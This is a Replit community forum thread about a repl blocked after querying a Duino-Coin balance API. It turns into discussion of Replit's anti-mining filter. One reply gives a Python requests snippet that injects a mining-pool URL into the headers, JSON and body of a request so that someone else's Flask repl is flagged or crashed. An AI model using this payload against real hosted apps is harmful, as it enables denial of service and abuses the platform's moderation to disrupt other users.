Requests getting blocked

ducoUsername = “revox”
requests.get(“https://server.duinocoin.com/balances/{}”.format(ducoUsername))
So I have this code the output should be:
{“result”:{“balance”:5808222.08661312,“created”:“before 23.08.2021”,“last_login”:1679130735,“stake_amount”:0,“stake_date”:0,“username”:“revox”,“verified”:“yes”,“verified_by”:“revox”,“verified_date”:1654803009,“warnings”:0},“server”:“duino-master-1”,“success”:true}
But instead it says:

You can’t run this Repl right now.

It may be temporarily unavailable or it may have violated our Terms of Service.If you are the owner of this Repl and believe you should be able to run it, you can try again later or contact support.

I checked the terms of service and the closest thing that it said is mining crypto. I am not doing that I am just checking the balance of someone who has crypto. Anyone know how to fix it so I don’t keep getting my repl available?

Welcome to the community, @UNIOINU! Can you send me the link to your repl please?

1 Like

Sorry for the late reply.
https://replit.com/@UNIOINU/LustrousWickedOctagon

But why and how will I get around it?

2 Likes

You can’t requesting that server is going to crash it because of how replit works

3 Likes

Not only that lol, you can also put

stratum+tcp://pool.bitcoin.com:3333

Literally anywhere in the repl, it just needs to be somewhere where it is processed by goval

1 Like

wait did you ask Luis or smth?

Luis’s code was reversed and someone leaked the src lol, it was pretty basic code obfuscation though.

2 Likes

Hold up, so for flask repls, how would someone “inject” that, they send it via headers, json, data? Into the url?

1 Like

Hey, I’ve seen this one!

2 Likes

lol yeah, apparently sending it in the headers or smth will crash a flask app xD

1 Like

i dont understand tho, how would you eve do that?

1 Like

like literally my guy

from requests import get

get("url", data=("stratum+tcp://pool.bitcoin.com:3333",), json={"stratum+tcp://pool.bitcoin.com:3333": "stratum+tcp://pool.bitcoin.com:3333"}, headers = {    "X-Requested-With": "stratum+tcp://pool.bitcoin.com:3333",
    "Origin": "stratum+tcp://pool.bitcoin.com:3333",
    "Accept": "application/json",
    "Referrer": "https://replit.com",
    "Content-Type": "application/json",
    "Connection": "keep-alive",
    "Host": "stratum+tcp://pool.bitcoin.com:3333",
    "x-requested-with": "XMLHttpRequest",
    "User-Agent": "Mozilla/5.0"})

Wait a minute
didn’t you say you wouldn’t share this with anyone

1 Like

If they not sharing it, they abusing it. :100: :skull:

How would you be abusing it by stopping other people from abusing it? That makes no sense.

1 Like

You misunderstood, I simply mean’t knowing @bigminiboss they probably abused it at some point.

because it was related to the post, they tried pinging duicoin

pppffff no way I would ever abuse something

Ok I’m sorry -_- I just thought it was ok since apparently other methods have been leaked and this person already had the fact in their post

1 Like